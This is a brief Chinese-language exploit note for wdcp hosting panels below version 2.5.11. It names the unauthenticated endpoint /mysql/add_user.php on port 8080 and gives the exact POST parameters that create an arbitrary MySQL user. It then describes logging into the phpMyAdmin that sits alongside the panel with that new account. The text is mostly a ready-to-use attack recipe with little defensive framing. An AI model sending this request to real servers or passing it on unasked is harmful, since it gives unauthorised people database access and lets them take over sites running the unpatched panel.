wdcp_v2.5.11版本以下任意用户添加漏洞

影响版本

wdcp_v2.5.11版本以下

利用方法

http://www.xxx.com:8080/mysql/add_user.php

提交以下内容

Submit_add=xxoo&user=xxoo&password=xxoo&dbname=mysql

而且lanmp一键安装的站在wdcp同级目录会有phpmyadmin,所以用phpmyadmin登录,可以看到用刚新增的xxoo用户登录成功。

http://www.xx.com:8080/phpmyadmin/